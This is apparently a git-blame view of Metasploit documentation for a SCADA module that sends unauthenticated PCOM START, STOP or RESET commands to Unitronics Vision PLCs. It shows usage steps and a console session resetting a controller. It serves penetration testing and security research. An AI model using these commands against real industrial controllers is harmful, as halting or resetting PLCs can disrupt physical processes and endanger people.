2019-01-09 19:47:47 +00:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
Unitronics Vision PLCs
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
2019-02-11 14:01:57 -06:00
|
|
|
1. Do: `use auxiliary/admin/scada/pcom_command`
|
2019-01-09 19:47:47 +00:00
|
|
|
2. Do: `set RHOST=IP` where IP is the IP address of the target
|
|
|
|
|
3. Do: `run` to send PCOM command
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
```
|
2019-02-11 14:01:57 -06:00
|
|
|
msf5 > use auxiliary/admin/scada/pcom_command
|
|
|
|
|
msf5 auxiliary(admin/scada/pcom_command) > show options
|
2019-01-09 19:47:47 +00:00
|
|
|
|
2019-02-11 14:01:57 -06:00
|
|
|
Module options (auxiliary/admin/scada/pcom_command):
|
2019-01-09 19:47:47 +00:00
|
|
|
|
|
|
|
|
Name Current Setting Required Description
|
|
|
|
|
---- --------------- -------- -----------
|
|
|
|
|
MODE RESET yes PLC command (Accepted: START, STOP, RESET)
|
|
|
|
|
RHOST yes The target address
|
|
|
|
|
RPORT 20256 yes The target port (TCP)
|
|
|
|
|
UNITID 0 no Unit ID (0 - 127)
|
|
|
|
|
|
2019-02-11 14:01:57 -06:00
|
|
|
msf5 auxiliary(admin/scada/pcom_command) > set RHOST 192.168.1.1
|
2019-01-09 19:47:47 +00:00
|
|
|
RHOST => 192.168.1.1
|
2019-02-11 14:01:57 -06:00
|
|
|
msf5 auxiliary(admin/scada/pcom_command) > run
|
2019-01-09 19:47:47 +00:00
|
|
|
|
|
|
|
|
[*] 192.168.1.1:20256 - Sending RESET command
|
|
|
|
|
[*] 192.168.1.1:20256 - Command accepted
|
|
|
|
|
[*] Auxiliary module execution completed
|
2019-02-11 14:01:57 -06:00
|
|
|
msf5 auxiliary(admin/scada/pcom_command) >
|
2019-01-09 19:47:47 +00:00
|
|
|
```
|
